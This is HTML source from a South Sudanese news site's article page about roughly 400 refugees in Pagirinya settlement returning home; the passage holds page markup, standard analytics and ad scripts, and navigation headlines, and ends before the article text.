<!DOCTYPE html>
<html lang="en-US">
<head>
	<meta charset="UTF-8"/>
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<link rel="profile" href="https://gmpg.org/xfn/11"/>
	<link rel="pingback" href="https://www.jubamonitor.com/xmlrpc.php"/>
	<style type='text/css'>/*
Welcome to the Special Recent Posts Custom CSS editor!
Please add all your custom CSS here and avoid modifying the core plugin files, since that'll make upgrading the plugin problematic. Your custom CSS will be loaded in your <head> section of your wordpress theme, which means that your rules will take precedence. Just add your CSS here for what you want to change, you don't need to copy all the plugin's stylesheet content.
*/</style><title>At least 400 refugees voluntarily returned back home &#8211; Juba Monitor</title>
<style>
#wpadminbar #wp-admin-bar-wccp_free_top_button .ab-icon:before {
	content: "\f160";
	color: #02CA02;
	top: 3px;
}
#wpadminbar #wp-admin-bar-wccp_free_top_button .ab-icon {
	transform: rotate(45deg);
}
</style>
<script type="application/javascript">var bingo_ruby_ajax_url = "https://www.jubamonitor.com/wp-admin/admin-ajax.php"</script><meta name='robots' content='max-image-preview:large' />
<link rel='dns-prefetch' href='//www.googletagmanager.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel='dns-prefetch' href='//pagead2.googlesyndication.com' />
<link rel="alternate" type="application/rss+xml" title="Juba Monitor &raquo; Feed" href="https://www.jubamonitor.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Juba Monitor &raquo; Comments Feed" href="https://www.jubamonitor.com/comments/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.1.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.1.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.jubamonitor.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.8.2"}};
			!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode;p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0);e=i.toDataURL();return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r<o.length;r++)t.supports[o[r]]=function(e){if(!p||!p.fillText)return!1;switch(p.textBaseline="top",p.font="600 32px Arial",e){case"flag":return s([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])?!1:!s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([10084,65039,8205,55357,56613],[10084,65039,8203,55357,56613])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(n=t.source||{}).concatemoji?c(n.concatemoji):n.wpemoji&&n.twemoji&&(c(n.twemoji),c(n.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<link rel='stylesheet' id='srp-layout-stylesheet-css'  href='https://www.jubamonitor.com/wp-content/plugins/special-recent-posts/css/layout.css?ver=5.8.2' type='text/css' media='all' />
<link rel='stylesheet' id='bingo_ruby_plugin_style-css'  href='https://www.jubamonitor.com/wp-content/plugins/bingo-ruby-core/assets/style.css?ver=1.6' type='text/css' media='all' />
<link rel='stylesheet' id='wp-block-library-css'  href='https://www.jubamonitor.com/wp-includes/css/dist/block-library/style.min.css?ver=5.8.2' type='text/css' media='all' />
<link rel='stylesheet' id='contact-form-7-css'  href='https://www.jubamonitor.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.1.4' type='text/css' media='all' />
<link rel='stylesheet' id='bootstrap-css'  href='https://www.jubamonitor.com/wp-content/themes/bingo/assets/external/bootstrap.css?ver=v3.3.1' type='text/css' media='all' />
<link rel='stylesheet' id='font-awesome-css'  href='https://www.jubamonitor.com/wp-content/themes/bingo/assets/external/font-awesome.css?ver=v4.7.0' type='text/css' media='all' />
<link rel='stylesheet' id='bingo_ruby_style_miscellaneous-css'  href='https://www.jubamonitor.com/wp-content/themes/bingo/assets/external/miscellaneous.css?ver=2.4' type='text/css' media='all' />
<link rel='stylesheet' id='bingo_ruby_style_main-css'  href='https://www.jubamonitor.com/wp-content/themes/bingo/assets/css/theme-style.css?ver=2.4' type='text/css' media='all' />
<link rel='stylesheet' id='bingo_ruby_style_responsive-css'  href='https://www.jubamonitor.com/wp-content/themes/bingo/assets/css/theme-responsive.css?ver=2.4' type='text/css' media='all' />
<link rel='stylesheet' id='bingo_ruby_style_default-css'  href='https://www.jubamonitor.com/wp-content/themes/bingo/style.css?ver=2.4' type='text/css' media='all' />
<style id='bingo_ruby_style_default-inline-css' type='text/css'>
.total-caption { font-family :Lato;}.banner-background-color { background-color: #ffffff; }.footer-copyright-wrap p { color: #dddddd; }.footer-copyright-wrap { background-color: #242424; }.post-excerpt{ font-size :14px;}
</style>
<link rel='stylesheet' id='frp-frontend-css'  href='https://www.jubamonitor.com/wp-content/plugins/flexible-recent-posts/css/frp-front.css?ver=5.8.2' type='text/css' media='all' />
<link rel='stylesheet' id='redux-google-fonts-bingo_ruby_theme_options-css'  href='https://fonts.googleapis.com/css?family=Lato%3A100%2C300%2C400%2C700%2C900%2C100italic%2C300italic%2C400italic%2C700italic%2C900italic%7CMontserrat%3A700%2C400%2C600%2C500&#038;ver=1630514983' type='text/css' media='all' />
<link rel='stylesheet' id='rps-style-css'  href='https://www.jubamonitor.com/wp-content/plugins/recent-posts-slider/css/style.css?ver=5.8.2' type='text/css' media='all' />
<script type='text/javascript' src='https://www.jubamonitor.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.0' id='jquery-core-js'></script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2' id='jquery-migrate-js'></script>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/plugins/table-creator/public/assets/js/datatables.min.js?ver=1.0.0' id='attc-datatable-js-js'></script>
<!--[if lt IE 9]>
<script type='text/javascript' src='https://www.jubamonitor.com/wp-content/themes/bingo/assets/external/html5.min.js?ver=3.7.3' id='html5-js'></script>
<![endif]-->

<!-- Google Analytics snippet added by Site Kit -->
<script type='text/javascript' src='https://www.googletagmanager.com/gtag/js?id=UA-153871760-5' id='google_gtagjs-js' async></script>
<script type='text/javascript' id='google_gtagjs-js-after'>
window.dataLayer = window.dataLayer || [];function gtag(){dataLayer.push(arguments);}
gtag('set', 'linker', {"domains":["www.jubamonitor.com"]} );
gtag("js", new Date());
gtag("set", "developer_id.dZTNiMT", true);
gtag("config", "UA-153871760-5", {"anonymize_ip":true});
</script>

<!-- End Google Analytics snippet added by Site Kit -->
<link rel="https://api.w.org/" href="https://www.jubamonitor.com/wp-json/" /><link rel="alternate" type="application/json" href="https://www.jubamonitor.com/wp-json/wp/v2/posts/51106" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.jubamonitor.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.jubamonitor.com/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 5.8.2" />
<link rel="canonical" href="https://www.jubamonitor.com/at-least-400-refugees-voluntarily-returned-back-home/" />
<link rel='shortlink' href='https://www.jubamonitor.com/?p=51106' />
<link rel="alternate" type="application/json+oembed" href="https://www.jubamonitor.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.jubamonitor.com%2Fat-least-400-refugees-voluntarily-returned-back-home%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://www.jubamonitor.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.jubamonitor.com%2Fat-least-400-refugees-voluntarily-returned-back-home%2F&#038;format=xml" />
<meta name="generator" content="Site Kit by Google 1.45.0" /><style type="text/css" media="screen"></style><script id="wpcp_disable_selection" type="text/javascript">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</script>
<script id="wpcp_disable_Right_Click" type="text/javascript">
document.ondragstart = function() { return false;}
	function nocontext(e) {
	   return false;
	}
	document.oncontextmenu = nocontext;
</script>

<!-- Google AdSense snippet added by Site Kit -->
<meta name="google-adsense-platform-account" content="ca-host-pub-2644536267352236">
<meta name="google-adsense-platform-domain" content="sitekit.withgoogle.com">
<!-- End Google AdSense snippet added by Site Kit -->

<!-- Google AdSense snippet added by Site Kit -->
<script src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-2465781200142527" crossorigin="anonymous" type="text/javascript"></script>

<!-- End Google AdSense snippet added by Site Kit -->
<meta property="og:title" content="At least 400 refugees voluntarily returned back home"/><meta property="og:type" content="article"/><meta property="og:url" content="https://www.jubamonitor.com/at-least-400-refugees-voluntarily-returned-back-home/"/><meta property="og:site_name" content="Juba Monitor"/><meta property="og:description" content="&lt;!-- wp:paragraph --&gt; By Jurugo Emmanuel Ogasto &lt;!-- /wp:paragraph --&gt; &lt;!-- wp:paragraph --&gt; At least 400 refugees in Pagirinya settlement have voluntarily repatriated back home after five years in the"/><meta property="og:image" content="https://www.jubamonitor.com/wp-content/uploads/2021/11/PagirinyaRefugeesduring-returning-back-home-after-five-years.jpg"/><link rel="icon" href="https://www.jubamonitor.com/wp-content/uploads/2016/03/2-1-50x50.jpg" sizes="32x32" />
<link rel="icon" href="https://www.jubamonitor.com/wp-content/uploads/2016/03/2-1.jpg" sizes="192x192" />
<link rel="apple-touch-icon" href="https://www.jubamonitor.com/wp-content/uploads/2016/03/2-1.jpg" />
<meta name="msapplication-TileImage" content="https://www.jubamonitor.com/wp-content/uploads/2016/03/2-1.jpg" />
<style type="text/css" title="dynamic-css" class="options-output">.footer-inner{background-color:#282828;background-repeat:no-repeat;background-size:cover;background-attachment:fixed;background-position:center center;}.topbar-wrap{font-family:Lato;text-transform:capitalize;font-weight:400;font-style:normal;font-size:13px;}.main-menu-inner,.off-canvas-nav-inner{font-family:Lato;text-transform:uppercase;letter-spacing:0px;font-weight:700;font-style:normal;font-size:15px;}.main-menu-inner .sub-menu,.off-canvas-nav-inner .sub-menu{font-family:Lato;text-transform:capitalize;letter-spacing:0px;font-weight:400;font-style:normal;font-size:14px;}.logo-wrap.is-logo-text .logo-text h1{font-family:Montserrat;text-transform:uppercase;letter-spacing:-1px;font-weight:700;font-style:normal;font-size:40px;}.logo-mobile-text span{font-family:Montserrat;text-transform:uppercase;letter-spacing:-1px;font-weight:700;font-style:normal;font-size:28px;}body, p{font-family:Lato;line-height:24px;font-weight:400;font-style:normal;color:#282828;font-size:15px;}.post-title.is-size-1{font-family:Montserrat;font-weight:700;font-style:normal;color:#282828;font-size:36px;}.post-title.is-size-2{font-family:Montserrat;font-weight:700;font-style:normal;color:#282828;font-size:30px;}.post-title.is-size-3{font-family:Montserrat;font-weight:700;font-style:normal;color:#282828;font-size:21px;}.post-title.is-size-4{font-family:Montserrat;font-weight:700;font-style:normal;color:#282828;font-size:18px;}.post-title.is-size-5{font-family:Montserrat;font-weight:700;font-style:normal;color:#282828;font-size:14px;}.post-title.is-size-6{font-family:Montserrat;font-weight:400;font-style:normal;color:#282828;font-size:13px;}h1,h2,h3,h4,h5,h6{font-family:Montserrat;text-transform:none;font-weight:700;font-style:normal;}.post-meta-info,.single-post-top,.counter-element{font-family:Lato;font-weight:400;font-style:normal;color:#999;font-size:12px;}.post-cat-info{font-family:Lato;text-transform:uppercase;font-weight:700;font-style:normal;font-size:11px;}.block-header-wrap{font-family:Montserrat;text-transform:uppercase;font-weight:600;font-style:normal;font-size:18px;}.block-ajax-filter-wrap{font-family:Montserrat;text-transform:uppercase;font-weight:500;font-style:normal;font-size:11px;}.widget-title{font-family:Montserrat;text-transform:uppercase;font-weight:600;font-style:normal;font-size:14px;}.breadcrumb-wrap{font-family:Lato;text-transform:none;font-weight:400;font-style:normal;color:#777777;font-size:12px;}</style></head>
<body data-rsssl=1 class="post-template-default single single-post postid-51106 single-format-standard unselectable ruby-body is-full-width is-navbar-sticky is-smart-sticky"  itemscope  itemtype="https://schema.org/WebPage" >
<div class="off-canvas-wrap is-dark-text">
	<div class="off-canvas-inner">
		<a href="#" id="ruby-off-canvas-close-btn"><i class="ruby-close-btn" aria-hidden="true"></i></a>
		<nav id="ruby-offcanvas-navigation" class="off-canvas-nav-wrap">
			<div class="menu-big-menu-container"><ul id="offcanvas-nav" class="off-canvas-nav-inner"><li id="menu-item-9598" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-9598"><a href="https://www.jubamonitor.com/">HOME</a></li>
<li id="menu-item-9582" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-has-children menu-item-9582 is-category-23"><a href="https://www.jubamonitor.com/category/news-2/">News</a>
<ul class="sub-menu">
	<li id="menu-item-9583" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-9583 is-category-2"><a href="https://www.jubamonitor.com/category/news/">National News</a></li>
</ul>
</li>
<li id="menu-item-9584" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-9584 is-category-5"><a href="https://www.jubamonitor.com/category/opinion/">Opinion</a>
<ul class="sub-menu">
	<li id="menu-item-9585" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9585 is-category-18"><a href="https://www.jubamonitor.com/category/opinion/editorial/">Editorial</a></li>
	<li id="menu-item-40975" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-40975 is-category-60"><a href="https://www.jubamonitor.com/category/a-foot-for-thought/">A foot for thought</a></li>
	<li id="menu-item-9592" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9592 is-category-15"><a href="https://www.jubamonitor.com/category/opinion/columnists/">Columnists</a></li>
	<li id="menu-item-9593" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9593 is-category-16"><a href="https://www.jubamonitor.com/category/opinion/columnists/lets-speak-out/">Let&#8217;s Speak Out</a></li>
</ul>
</li>
<li id="menu-item-9586" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9586 is-category-3"><a href="https://www.jubamonitor.com/category/cover-story/">Cover Story</a></li>
<li id="menu-item-9587" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9587 is-category-10"><a href="https://www.jubamonitor.com/category/sports/">Sports</a></li>
<li id="menu-item-9589" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9589 is-category-27"><a href="https://www.jubamonitor.com/category/business/">Business</a></li>
<li id="menu-item-11765" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-11765 is-category-61"><a href="https://www.jubamonitor.com/category/agriculture/agriculture-agriculture/">AGRICULTURE</a></li>
<li id="menu-item-9590" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9590 is-category-33"><a href="https://www.jubamonitor.com/category/education/">Education</a></li>
<li id="menu-item-9588" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9588 is-category-9"><a href="https://www.jubamonitor.com/category/entertainment/">Entertainment</a></li>
</ul></div>		</nav>
												<div class="off-canvas-social-wrap">
					<a class="icon-facebook icon-social" title="facebook" href="https://web.facebook.com/TheJubaMonitor/" target="_blank"><i class="fa fa-facebook" aria-hidden="true"></i></a><a class="icon-twitter icon-social" title="twitter" href="https://twitter.com/JubaMonitor" target="_blank"><i class="fa fa-twitter" aria-hidden="true"></i></a>				</div>
										<div class="off-canvas-widget-section-wrap canvas-sidebar-wrap">
				<div class="canvas-sidebar-inner">
									</div>
			</div>
			</div>
</div><div id="ruby-site" class="site-outer">
	<div class="header-wrap header-style-1">
	<div class="header-inner">
		<div class="topbar-wrap topbar-style-1 is-light-text">
	<div class="ruby-container">
		<div class="topbar-inner container-inner clearfix">
			<div class="topbar-left">
				<div class="topbar-info">
			     <span class="info-email"><i class="fa fa-envelope" aria-hidden="true"></i><span>jubamonitor@yahoo.com</span></span>
     </div>				
<div class="topbar-date">
	<span>Thursday, November 11th, 2021</span>
</div>							</div>
			<div class="topbar-right">
				
	<div class="topbar-social social-tooltips">
		<a class="icon-facebook icon-social" title="facebook" href="https://web.facebook.com/TheJubaMonitor/" target="_blank"><i class="fa fa-facebook" aria-hidden="true"></i></a><a class="icon-twitter icon-social" title="twitter" href="https://twitter.com/JubaMonitor" target="_blank"><i class="fa fa-twitter" aria-hidden="true"></i></a>	</div>
                							</div>
		</div>
	</div>
</div>

		<div class="banner-wrap banner-background-color">
			
			<div class="ruby-container">
				<div class="banner-inner container-inner clearfix">
					<div class="logo-wrap is-logo-image"  itemscope  itemtype="https://schema.org/Organization" >
	<div class="logo-inner">
							<a href="https://www.jubamonitor.com/" class="logo" title="Juba Monitor">
				<img data-no-retina src="https://www.jubamonitor.com/wp-content/uploads/2019/01/juba-monitorLOGO.jpg" height="" width=""  alt="Juba Monitor">
			</a>
						</div><!--#logo inner-->
    </div>
					
	<div class="banner-ad-wrap">
		<div class="banner-ad-inner">
                                                <div class="banner-ad-image">
                        <img src="https://www.jubamonitor.com/wp-content/uploads/2019/01/jubamonitor-ads-2.jpg" alt="Juba Monitor">
                    </div>
                            		</div>
	</div>
				</div>
			</div>
		</div>

		<div class="navbar-outer clearfix">
			<div class="navbar-wrap">
				<div class="ruby-container">
					<div class="navbar-inner container-inner clearfix">
						<div class="navbar-left">
							<div class="off-canvas-btn-wrap">
	<div class="off-canvas-btn">
		<a href="#" class="ruby-trigger" title="off canvas button">
			<span class="icon-wrap"></span>
		</a>
	</div>
</div>							<div class="logo-mobile-wrap is-logo-mobile-image"  itemscope  itemtype="https://schema.org/Organization" >
	<div class="logo-mobile-inner">
        <a href="https://www.jubamonitor.com/" class="logo" title="Juba Monitor">
            <img height="" width="" src="https://www.jubamonitor.com/wp-content/uploads/2019/01/juba-monitorMOBILELOGO.jpg" alt="Juba Monitor">
        </a>
	</div>
</div>
							<nav id="ruby-main-menu" class="main-menu-wrap"  itemscope  itemtype="https://schema.org/SiteNavigationElement" >
	<div class="menu-big-menu-container"><ul id="main-nav" class="main-menu-inner"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-9598"><a href="https://www.jubamonitor.com/">HOME</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-has-children menu-item-9582 is-category-23 is-cat-mega-menu is-mega-menu"><a href="https://www.jubamonitor.com/category/news-2/">News</a><div class="mega-category-menu mega-menu-wrap sub-menu"><div class="mega-category-menu-inner"><ul class="sub-menu is-sub-default">	<li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-9583 is-category-2" data-mega_sub_filter="2" ><a href="https://www.jubamonitor.com/category/news/">National News</a></li></ul><div id="ruby_mega_9582" class="ruby-block-wrap block-mega-menu block-mega-menu-sub is-light-text is-ajax-pagination is-wrapper" data-block_id= ruby_mega_9582 data-block_name= bingo_ruby_mega_block_cat_sub data-posts_per_page= 4 data-block_page_max= 1458 data-block_page_current= 1 data-category_id= 23 data-orderby= date_post ><div class="ruby-block-inner ruby-container"><div class="block-content-wrap"><div class="block-content-inner row"><div class="post-outer col-xs-3"><article class="post-wrap post-grid-m2"><div class="post-header"><div class="post-thumb-outer"><div class=" post-thumb is-image"><a href="https://www.jubamonitor.com/ministers-two-left-in-doha-over-covid-19/" title="MINISTERS-Two left in Doha over COVID-19" rel="bookmark"><span class="thumbnail-resize"><span class="thumbnail-image"><img width="540" height="206" src="https://www.jubamonitor.com/wp-content/uploads/2021/11/Foreign-Affairs-Minister-MayiikAyiiDeng-540x206.jpg" class="attachment-bingo_ruby_crop_540x370 size-bingo_ruby_crop_540x370 wp-post-image" alt="" loading="lazy" /></span></span><!--#thumbnail resize--></a></div><!--#post thumbnail--><div class="post-cat-info clearfix is-absolute is-light-text"><a class="cat-info-el cat-info-id-23" href="https://www.jubamonitor.com/category/news-2/" title="News">News</a></div><!--#post cat info--></div></div><!--#post header--><div class="post-body"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/ministers-two-left-in-doha-over-covid-19/" rel="bookmark" title="MINISTERS-Two left in Doha over COVID-19">MINISTERS-Two left in Doha over COVID-19</a></h2><!--#post title--></div><!--#post body--></article></div><div class="post-outer col-xs-3"><article class="post-wrap post-grid-m2"><div class="post-header"></div><!--#post header--><div class="post-body"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/trinity-energy-tops-2021-continental-award-in-cape-town/" rel="bookmark" title="Trinity Energy tops 2021 continental award in Cape Town">Trinity Energy tops 2021 continental award in Cape Town</a></h2><!--#post title--></div><!--#post body--></article></div><div class="post-outer col-xs-3"><article class="post-wrap post-grid-m2"><div class="post-header"><div class="post-thumb-outer"><div class=" post-thumb is-image"><a href="https://www.jubamonitor.com/vp-abdelbagi-orders-for-screening-officials-after-contrariety-covid-tests-abroad/" title="VP Abdelbagi orders for screening officials after contrariety Covid tests abroad" rel="bookmark"><span class="thumbnail-resize"><span class="thumbnail-image"><img width="540" height="340" src="https://www.jubamonitor.com/wp-content/uploads/2021/11/The-Vice-President-for-Service-Cluster-540x340.jpg" class="attachment-bingo_ruby_crop_540x370 size-bingo_ruby_crop_540x370 wp-post-image" alt="" loading="lazy" /></span></span><!--#thumbnail resize--></a></div><!--#post thumbnail--><div class="post-cat-info clearfix is-absolute is-light-text"><a class="cat-info-el cat-info-id-23" href="https://www.jubamonitor.com/category/news-2/" title="News">News</a></div><!--#post cat info--></div></div><!--#post header--><div class="post-body"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/vp-abdelbagi-orders-for-screening-officials-after-contrariety-covid-tests-abroad/" rel="bookmark" title="VP Abdelbagi orders for screening officials after contrariety Covid tests abroad">VP Abdelbagi orders for screening officials after contrariety Covid tests abroad</a></h2><!--#post title--></div><!--#post body--></article></div><div class="post-outer col-xs-3"><article class="post-wrap post-grid-m2"><div class="post-header"></div><!--#post header--><div class="post-body"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/school-trauma-clubs-trained-on-drug-abuse-in-yei/" rel="bookmark" title="School trauma clubs trained on drug abuse in Yei">School trauma clubs trained on drug abuse in Yei</a></h2><!--#post title--></div><!--#post body--></article></div></div></div><!-- #block content--><div class="block-footer clearfix"><div class="ajax-pagination ajax-nextprev clearfix"><a href="#" class="ajax-pagination-link ajax-link ajax-prev" data-ajax_pagination_link ="prev"><i class="fa fa-angle-left" aria-hidden="true"></i></a><a href="#" class="ajax-pagination-link ajax-link ajax-next" data-ajax_pagination_link ="next"><i class="fa fa-angle-right" aria-hidden="true"></i></a></div><!--next prev--></div></div></div><!-- #block wrap--></div></div><!--#mega cat menu--></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-9584 is-category-5 is-cat-mega-menu is-mega-menu"><a href="https://www.jubamonitor.com/category/opinion/">Opinion</a><div class="mega-category-menu mega-menu-wrap sub-menu"><div class="mega-category-menu-inner"><ul class="sub-menu is-sub-default">	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9585 is-category-18" data-mega_sub_filter="18" ><a href="https://www.jubamonitor.com/category/opinion/editorial/">Editorial</a></li>	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-40975 is-category-60" data-mega_sub_filter="60" ><a href="https://www.jubamonitor.com/category/a-foot-for-thought/">A foot for thought</a></li>	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9592 is-category-15" data-mega_sub_filter="15" ><a href="https://www.jubamonitor.com/category/opinion/columnists/">Columnists</a></li>	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9593 is-category-16" data-mega_sub_filter="16" ><a href="https://www.jubamonitor.com/category/opinion/columnists/lets-speak-out/">Let&#8217;s Speak Out</a></li></ul><div id="ruby_mega_9584" class="ruby-block-wrap block-mega-menu block-mega-menu-sub is-light-text is-ajax-pagination is-wrapper" data-block_id= ruby_mega_9584 data-block_name= bingo_ruby_mega_block_cat_sub data-posts_per_page= 4 data-block_page_max= 753 data-block_page_current= 1 data-category_id= 5 data-orderby= date_post ><div class="ruby-block-inner ruby-container"><div class="block-content-wrap"><div class="block-content-inner row"><div class="post-outer col-xs-3"><article class="post-wrap post-grid-m2"><div class="post-header"></div><!--#post header--><div class="post-body"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/once-again-thank-you-all/" rel="bookmark" title="ONCE AGAIN THANK YOU ALL">ONCE AGAIN THANK YOU ALL</a></h2><!--#post title--></div><!--#post body--></article></div><div class="post-outer col-xs-3"><article class="post-wrap post-grid-m2"><div class="post-header"></div><!--#post header--><div class="post-body"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/is-something-terribly-wrong-with-covid-19-test-labs/" rel="bookmark" title="IS SOMETHING TERRIBLY WRONG WITH COVID-19 TEST LABS">IS SOMETHING TERRIBLY WRONG WITH COVID-19 TEST LABS</a></h2><!--#post title--></div><!--#post body--></article></div><div class="post-outer col-xs-3"><article class="post-wrap post-grid-m2"><div class="post-header"></div><!--#post header--><div class="post-body"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/retirees-candidates-and-victims-of-corruption/" rel="bookmark" title="Retirees, candidates and victims of corruption">Retirees, candidates and victims of corruption</a></h2><!--#post title--></div><!--#post body--></article></div><div class="post-outer col-xs-3"><article class="post-wrap post-grid-m2"><div class="post-header"></div><!--#post header--><div class="post-body"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/what-you-should-not-do/" rel="bookmark" title="WHAT YOU SHOULD NOT DO">WHAT YOU SHOULD NOT DO</a></h2><!--#post title--></div><!--#post body--></article></div></div></div><!-- #block content--><div class="block-footer clearfix"><div class="ajax-pagination ajax-nextprev clearfix"><a href="#" class="ajax-pagination-link ajax-link ajax-prev" data-ajax_pagination_link ="prev"><i class="fa fa-angle-left" aria-hidden="true"></i></a><a href="#" class="ajax-pagination-link ajax-link ajax-next" data-ajax_pagination_link ="next"><i class="fa fa-angle-right" aria-hidden="true"></i></a></div><!--next prev--></div></div></div><!-- #block wrap--></div></div><!--#mega cat menu--></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9586 is-category-3"><a href="https://www.jubamonitor.com/category/cover-story/">Cover Story</a></li><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9587 is-category-10 is-cat-mega-menu is-mega-menu"><a href="https://www.jubamonitor.com/category/sports/">Sports</a><div class="mega-category-menu mega-menu-wrap sub-menu"><div class="mega-category-menu-inner"><div id="ruby_mega_9587" class="ruby-block-wrap block-mega-menu is-light-text is-ajax-pagination is-wrapper" data-block_id= ruby_mega_9587 data-block_name= bingo_ruby_mega_block_cat data-posts_per_page= 5 data-block_page_max= 41 data-block_page_current= 1 data-category_id= 10 data-orderby= date_post ><div class="ruby-block-inner ruby-container"><div class="block-content-wrap"><div class="block-content-inner row"><div class="post-outer ruby-col-5"><article class="post-wrap post-grid-m2"><div class="post-header"></div><!--#post header--><div class="post-body"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/fifa-to-construct-a-new-football-stadium/" rel="bookmark" title="FIFA to construct a new Football Stadium">FIFA to construct a new Football Stadium</a></h2><!--#post title--></div><!--#post body--></article></div><div class="post-outer ruby-col-5"><article class="post-wrap post-grid-m2"><div class="post-header"></div><!--#post header--><div class="post-body"><h2 class="post-title entry-title is-size-5"><a class="post-title-link" href="https://www.jubamonitor.com/easter-fc-crowned-champions-of-south-sudan-cup/" rel="bookmark" title="Easter FC crowned champions of South Sudan cup">Easter FC crowned champions of South Sudan cup</a></h2><!--#post title--></div><!--#post body--></article></div><div class="post-outer ruby-col-5"><article class="post-wrap post-grid-m2"><div class="post-header"><div class="post-thumb-outer"><div class=" post-thumb is-image"><a href="https://www.jubamonitor.com/blind-football-federation-organizes-its-match-today/" title="Blind Football Federation organizes its Match today" rel="bookmark"><span class="thumbnail-resize"><span class="thumbnail-image"><img width="540" height="370" src="https://www.jubamonitor.com/wp-content/uploads/2021/11/South-Sudan-Blind-Football-Federation-540x370.jpg" class="attachment-bingo_ruby_crop_540x370 size-bingo_ruby_crop_540x370 wp-post-image" alt="" loading="lazy" /></span></span><!--#thumbnail resize--></a></div><!--#post thumbnail--><div class="post-cat-info clearfix is-absolute is-light-text"><a class="cat-info-el cat-info-id-23" href="https://www.jubamonitor.com/category/news-2/" title="News">News</a><a class="cat-info-el cat-info-id-10" href="https://www.jubamonitor.com/category/sports/" title="Sports">Sports</a></div><!--#post 